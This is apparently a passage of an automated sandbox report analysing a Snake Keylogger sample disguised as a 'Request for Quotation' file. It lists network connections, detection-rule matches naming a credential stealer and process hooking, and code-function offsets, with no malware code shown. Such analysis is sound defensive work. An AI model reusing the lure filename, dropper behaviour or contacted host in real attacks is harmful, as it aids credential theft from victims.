                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002F94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/x
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49767 version: TLS 1.2

                System Summary

                barindex
                Source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: initial sampleStatic PE information: Filename: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 0_2_00EFD51C0_2_00EFD51C
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 0_2_06C5CF900_2_06C5CF90
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 0_2_06C557980_2_06C55798
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 0_2_06C572780_2_06C57278
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 0_2_06C553600_2_06C55360
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 0_2_06C56E400_2_06C56E40
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 0_2_06C54F280_2_06C54F28
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0125C1469_2_0125C146
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_012553629_2_01255362
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0125D2789_2_0125D278
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0125C4689_2_0125C468
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0125C7389_2_0125C738
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_012569A09_2_012569A0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0125E9889_2_0125E988
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_012529E09_2_012529E0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0125CA089_2_0125CA08
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0125CCD89_2_0125CCD8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0125CFA99_2_0125CFA9
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_01256FC89_2_01256FC8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_01253E099_2_01253E09
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0125F9619_2_0125F961
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0125E97A9_2_0125E97A
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_05978FB09_2_05978FB0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059781D09_2_059781D0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_05977B789_2_05977B78
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059715F89_2_059715F8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059715E89_2_059715E8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_05970D399_2_05970D39
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597E5389_2_0597E538
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597C5589_2_0597C558
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_05970D489_2_05970D48
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597E5489_2_0597E548
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597C5489_2_0597C548
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059704989_2_05970498
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059704899_2_05970489
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059764889_2_05976488
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597DC199_2_0597DC19
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597FC189_2_0597FC18
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597BC389_2_0597BC38
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597BC2A9_2_0597BC2A
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597DC289_2_0597DC28
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059734509_2_05973450
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059764789_2_05976478
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059734609_2_05973460
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597D7989_2_0597D798
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597B7989_2_0597B798
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597D7879_2_0597D787
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059757809_2_05975780
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597F7889_2_0597F788
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_05978FA19_2_05978FA1
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597B7A89_2_0597B7A8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_05972FF99_2_05972FF9
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059777109_2_05977710
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059777209_2_05977720
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059727589_2_05972758
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059727499_2_05972749
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059757709_2_05975770
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597F7789_2_0597F778
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_05971E989_2_05971E98
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_05971EA89_2_05971EA8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_05974ED09_2_05974ED0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_05974EC09_2_05974EC0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059746109_2_05974610
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059746209_2_05974620
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597EE579_2_0597EE57
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_05976E729_2_05976E72
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_05976E709_2_05976E70
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597CE789_2_0597CE78
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597CE679_2_0597CE67
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597EE689_2_0597EE68
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059711909_2_05971190
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059711A09_2_059711A0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597E9D89_2_0597E9D8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597C9D89_2_0597C9D8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597E9C89_2_0597E9C8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597C9E89_2_0597C9E8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597A9389_2_0597A938
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597A9289_2_0597A928
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597C0B79_2_0597C0B7
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059738B89_2_059738B8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597E0B89_2_0597E0B8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597E0A79_2_0597E0A7
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597C0C89_2_0597C0C8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059708F09_2_059708F0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059708E09_2_059708E0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059730079_2_05973007
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059700069_2_05970006
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059730089_2_05973008
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059760309_2_05976030
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059760229_2_05976022
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059700409_2_05970040
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_05972BB09_2_05972BB0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_05972BA09_2_05972BA0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_05975BD89_2_05975BD8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597531A9_2_0597531A
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597B3189_2_0597B318
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597B3079_2_0597B307
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059723009_2_05972300
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597D3089_2_0597D308
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059753289_2_05975328
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_05977B699_2_05977B69
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059772B89_2_059772B8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059772C89_2_059772C8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597D2F79_2_0597D2F7
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_059722F09_2_059722F0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597F2F89_2_0597F2F8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_0597F2E79_2_0597F2E7
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_05976A189_2_05976A18
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_05971A509_2_05971A50
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_05971A419_2_05971A41
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_05974A789_2_05974A78
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 9_2_05974A689_2_05974A68
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 11_2_00BDD51C11_2_00BDD51C
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 11_2_069AC1F011_2_069AC1F0
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 11_2_069A579811_2_069A5798
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 11_2_069A727811_2_069A7278
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 11_2_069A536011_2_069A5360
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 11_2_069A6E4011_2_069A6E40
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 11_2_069A4F2811_2_069A4F28
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_0166C14614_2_0166C146
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_0166711814_2_01667118
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_0166A08814_2_0166A088
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_0166536214_2_01665362
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_0166D27814_2_0166D278
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_0166C46814_2_0166C468
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_0166C73814_2_0166C738
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_016669A014_2_016669A0
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_0166E98814_2_0166E988
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_01663B8C14_2_01663B8C
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_0166CA0814_2_0166CA08
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_0166CCD814_2_0166CCD8
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_0166CFAA14_2_0166CFAA
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_0166F96114_2_0166F961
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_0166E97A14_2_0166E97A
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_016629EC14_2_016629EC
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_01663AA114_2_01663AA1
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_01663E0914_2_01663E09
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DB1E8014_2_06DB1E80
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DB17A014_2_06DB17A0
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DB0B3014_2_06DB0B30
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DB9C7014_2_06DB9C70
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DBFC6814_2_06DBFC68
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DBF81014_2_06DBF810
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DB502814_2_06DB5028
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DB954814_2_06DB9548
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DB296814_2_06DB2968
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DBEAF814_2_06DBEAF8
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DBE6B014_2_06DBE6B0
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DBE6AE14_2_06DBE6AE
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DBE25814_2_06DBE258
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DBE24914_2_06DBE249
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DB1E7014_2_06DB1E70
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DBDE0014_2_06DBDE00
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DB9BFB14_2_06DB9BFB
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DB8B9114_2_06DB8B91
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DB178F14_2_06DB178F
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DBF3B814_2_06DBF3B8
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DB8BA014_2_06DB8BA0
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DBEF5114_2_06DBEF51
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DBEF6014_2_06DBEF60
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DBEB0814_2_06DBEB08
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DB932814_2_06DB9328
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DB0B2014_2_06DB0B20
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DBD0F814_2_06DBD0F8
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DBCCA014_2_06DBCCA0
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DB004014_2_06DB0040
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DB501F14_2_06DB501F
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DBF80114_2_06DBF801
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DB000714_2_06DB0007
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DBDDFE14_2_06DBDDFE
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DBD99914_2_06DBD999
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DBD9A814_2_06DBD9A8
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DBD55014_2_06DBD550
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 14_2_06DBD54014_2_06DBD540
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003CEA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2118483464.0000000006F90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000000.2057334200.0000000000692000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewzxU.exe6 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
